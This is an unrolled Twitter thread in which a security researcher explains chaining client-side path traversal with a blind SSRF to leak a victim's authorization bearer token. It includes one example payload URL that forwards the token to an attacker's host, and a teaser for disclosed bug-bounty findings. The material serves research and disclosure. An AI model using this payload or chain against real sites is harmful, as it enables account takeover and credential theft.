Share this page!

Sam Curry Profile picture
Twitter logo
12 Sep, 6 tweets, 2 min read
Client side path traversal is a really fun thing to explore for CSRF and XSS. Revisited an unexploitable blind SSRF which (1) required the authorization header to be sent and (2) passed the authorization header to the provided "url" parameter. This would be account takeover ...
... but, you can't directly CSRF a victim into sending an authorization bearer, therefore you can't trigger the CSRF and steal their token via the blind SSRF which forwarded the header. Luckily for us, the blind SSRF API call was via GET (/example?url=https:// + auth header) ...
... and this allows us to explore the rest of the app for potential client-side path traversal vulnerabilities. These are somewhat easy to find because they don't pose much risk by themselves. If a web app is large and ran via static JavaScript, you can find them pretty easy ...
... by looking in the navigation bar for things like ?x=1 or anything passed in via the URL hash and seeing if they send an HTTP request on your behalf.

An example would be ?id=1 loading in /api/users/1 whilst sending your authorization bearer.

This is great for us, because ...
... we can then exploit the blind SSRF which leaks the victim authorization bearer via the following payload:

https://victimsite/users?id=/../../example?url=https://oursite/?

This is important, because the JavaScript on the site will pass in the authorization bearer, and we ...
... can trigger the CSRF on behalf of the victim user versus them not sending an authorization bearer whatsoever.

Another interesting one is...
traversal -> open redirect -> attacker JSON -> render -> XSS.

I've seen a few of these and they're definitely not novel, but very fun!

• • •

Missing some Tweet in this thread? You can try to force a refresh
 

Keep Current with Sam Curry

Sam Curry Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

PDF

Twitter may remove this content at anytime! Save it as PDF for later use!

Try unrolling a thread yourself!

how to unroll video
  1. Follow @ThreadReaderApp to mention us!

  2. From a Twitter thread mention us with a keyword "unroll"
@threadreaderapp unroll

Practice here first or read more on our help page!

More from @samwcyo

Sam Curry Profile picture
15 Jan
Since it's 2021 I'd like to go ahead and disclose some bugs I wasn't able to talk about in 2020. These were issues that either got NDA'd or had long remediation timelines.

The following are quick summaries and proof of concepts for some of the simpler bugs:
1. IDOR on Apple via "X-Dsid" header allows attacker to retrieve name, credit card information, addresses, and various PII of any Apple users via DSID
Bounty: $25,000

Could create a "god cookie" which had access to all Apple customers name, address, phone, and billing info. Image
2. Reflected XSS/CSRF token bypass on SecureTransport 5.4 via URL parameters
Bounty: $7,000 and a comfy backpack from Axway :)

Could traverse to a "CSRF debug page" which would auto-submit a request with an appended CSRF token. Also vulnerable to (limited) XSS. ImageImage
Read 6 tweets

Did Thread Reader help you today?

Support us! We are indie developers!

This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3/month or $30/year) and get exclusive features!

Become Premium

Too expensive? Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal Become our Patreon

Thank you for your support!

Follow Us on Twitter!

Like this author's thread?

Get emails when @samwcyo has new unrolls!

Check out other threads from @samwcyo!

Read all threads by @samwcyo

:(